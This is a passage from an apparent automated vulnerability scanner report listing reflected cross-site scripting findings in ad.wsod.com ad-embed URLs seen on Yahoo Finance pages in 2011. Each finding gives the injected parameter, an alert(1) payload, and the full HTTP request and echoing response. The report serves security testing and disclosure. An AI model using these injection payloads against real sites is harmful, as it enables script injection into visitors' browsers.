           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*ca1c8"><script>alert(1)</script>32f3224a8ebhttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.163. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcec5"-alert(1)-"c40782d0160 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*fcec5"-alert(1)-"c40782d0160 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2633

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*fcec5"-alert(1)-"c40782d0160">
...[SNIP]...

1.164. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55caa"><script>alert(1)</script>296a718dfe2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&55caa"><script>alert(1)</script>296a718dfe2=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2669

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
o/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&55caa"><script>alert(1)</script>296a718dfe2=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.165. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82275"-alert(1)-"e21cd84f83a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&82275"-alert(1)-"e21cd84f83a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2639

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
o/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&82275"-alert(1)-"e21cd84f83a=1">
...[SNIP]...

1.166. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [ybt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the ybt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18523</script><script>alert(1)</script>afcd3201317 was submitted in the ybt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;831918523</script><script>alert(1)</script>afcd3201317&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830247**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;831918523</script><script>alert(1)</script>afcd3201317&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244
...[SNIP]...

1.167. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [yhdata parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the yhdata request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fcfe</script><script>alert(1)</script>f4aa53a2d01 was submitted in the yhdata parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=9fcfe</script><script>alert(1)</script>f4aa53a2d01&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:39:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300829940**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=9fcfe</script><script>alert(1)</script>f4aa53a2d01&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW8
...[SNIP]...

1.168. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [yyob parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the yyob request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b08eb</script><script>alert(1)</script>58b6acd6d7e was submitted in the yyob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=b08eb</script><script>alert(1)</script>58b6acd6d7e&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:41:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830072**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=b08eb</script><script>alert(1)</script>58b6acd6d7e&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQ
...[SNIP]...

1.169. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 938c2</script><script>alert(1)</script>87cf77e2ec9 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,938c2</script><script>alert(1)</script>87cf77e2ec9&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:42:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830176**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,938c2</script><script>alert(1)</script>87cf77e2ec9&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/
...[SNIP]...

1.170. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217** [&click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217**

Issue detail

The value of the &click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81b39'-alert(1)-'9625dc88b7b was submitted in the &click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews%3B_ylt%3DAg9ozvEv79CyQnz4pgKYSfO7YWsA%3B_ylu%3DX3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*81b39'-alert(1)-'9625dc88b7b HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:38:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:38:29 GMT; path=/
Set-Cookie: i_1=46:477:988:45:0:38107:1300829909:B2|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2; expires=Thu, 21-Apr-2011 21:38:29 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*81b39'-alert(1)-'9625dc88b7bhttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.988.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews;_ylt=Ag9ozvEv79Cy
...[SNIP]...

1.171. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8486'-alert(1)-'f5bceba6f79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews%3B_ylt%3DAg9ozvEv79CyQnz4pgKYSfO7YWsA%3B_ylu%3DX3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&a8486'-alert(1)-'f5bceba6f79=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
